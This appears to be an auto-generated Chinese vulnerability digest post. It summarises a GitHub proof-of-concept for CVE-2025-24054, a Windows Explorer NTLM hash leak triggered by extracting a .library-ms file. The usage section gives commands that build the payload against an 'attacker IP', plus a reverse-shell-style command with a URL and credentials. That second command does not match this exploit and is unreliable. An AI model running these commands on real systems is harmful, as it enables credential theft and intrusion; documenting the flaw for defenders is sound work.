Windows Explorer NTLM Hash Leak via RAR/ZIP Extraction and library-ms File Vulnerability

漏洞信息

漏洞名称: Windows Explorer NTLM Hash Leak via RAR/ZIP Extraction and .library-ms File Vulnerability

漏洞编号:

  • CVE: CVE-2025-24054

漏洞类型: 信息泄露

漏洞等级: 高危

漏洞描述: 该漏洞影响Windows操作系统中的Windows Explorer组件,这是一个广泛使用的文件管理器,用于浏览和管理文件和文件夹。Windows Explorer在处理从RAR或ZIP压缩包中提取的.library-ms文件时存在安全漏洞。具体来说,当用户从压缩包中提取.library-ms文件时,Windows Explorer会自动发起SMB认证请求,从而导致NTLM哈希泄露。用户无需打开或执行该文件,仅需提取即可触发泄露。这一漏洞的技术根源在于Windows Explorer对.library-ms文件的处理逻辑存在缺陷,未能正确验证或限制文件的自动行为。此漏洞可能导致攻击者获取用户的NTLM哈希,进而可能用于进一步的攻击,如Pass-the-Hash攻击,从而获得对系统资源的未授权访问。由于该漏洞在用户仅进行文件提取操作时即可触发,且无需用户交互,因此具有较高的利用风险。

产品厂商: Microsoft

产品名称: Windows Explorer

来源: https://github.com/Royall-Researchers/CVE-2025-24071

类型: CVE-2025:github search

仓库文件

  • README.md
  • poc.py

来源概述

CVE-2025-24071_PoC

CVE-2025-24071: NTLM Hash Leak via RAR/ZIP Extraction and .library-ms File

Windows Explorer automatically initiates an SMB authentication request when a .library-ms file is extracted from a .rar archive, leading to NTLM hash disclosure. The user does not need to open or execute the file—simply extracting it is enough to trigger the leak.

usage

1
2
3
4
5
6

>>python poc.py

>>enter file name: your file name

>>enter IP: attacker IP
1
>>python3 poc.py --url http://domainname.com --user admin --password password --reverse-ip 10.10.10.10 --reverse-port 8888

update:

Update: Microsoft has changed its CVE number. The CVE number previously defined by Microsoft, CVE-2025-24071, has been updated to CVE-2025-24054.🤷‍♂

Github Poc
#CVE-2025:github search #信息泄露
Windows Explorer NTLM Hash Leak via RAR/ZIP Extraction and library-ms File Vulnerability
http://example.com/2025/07/05/github_1537094374/
作者
lianccc
发布于
2025年7月5日
许可协议